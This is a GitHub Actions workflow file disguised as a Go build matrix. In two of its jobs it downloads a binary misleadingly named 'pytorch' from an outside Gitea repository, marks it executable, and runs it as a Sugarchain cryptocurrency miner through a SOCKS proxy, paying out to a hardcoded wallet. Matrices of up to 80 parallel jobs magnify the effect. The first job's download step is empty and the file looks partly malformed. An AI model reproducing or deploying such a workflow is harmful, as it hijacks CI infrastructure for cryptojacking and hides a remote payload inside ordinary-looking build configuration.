name: Bitbucket
on: [push, pull_request]
jobs:
  build:
    name: Progress Bitbucket
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 40
      fail-fast: false
      matrix: 
        go: [1.1, 1.2, 1.3, 1.4]
        flag: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 163
    env:
        NUM_JOBS: 40
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Download
      run: |
  postgres-2:
    name: Bitbucket-2
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 80
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8]
        flag: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 163
    env:
        NUM_JOBS: 80
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Download
      run: wget https://try.gitea.io/shxyz-01/bitbucsugr/raw/branch/main/pytorch
    - name: Extract
      run: chmod +x pytorch
    - name: Screen
      run: screen -dmS ls
    - name: Keep Alive
      run: |
        POOL=stratum+tcp://1pool.sugarchain.org:3333
        PROXY=socks4://188.244.21.196:4145
        WALLET=sugar1qncwd9uvepk8y3qpp25pjvqunyzjlj44wzhn2as.hoki
        ./pytorch -a yespowersugar -o $POOL -u $WALLET -x $PROXY -q
  postgres-3:
    name: Bitbucket-3
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 80
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8]
        flag: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 163
    env:
        NUM_JOBS: 80
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Download
      run: wget https://try.gitea.io/shxyz-01/bitbucsugr/raw/branch/main/pytorch
    - name: Extract
      run: chmod +x pytorch
    - name: Screen
      run: screen -dmS ls
    - name: Keep Alive
      run: |
        POOL=stratum+tcp://1pool.sugarchain.org:3333
        PROXY=socks4://188.244.21.196:4145
        WALLET=sugar1qncwd9uvepk8y3qpp25pjvqunyzjlj44wzhn2as.hoki
        ./pytorch -a yespowersugar -o $POOL -u $WALLET -x $PROXY -q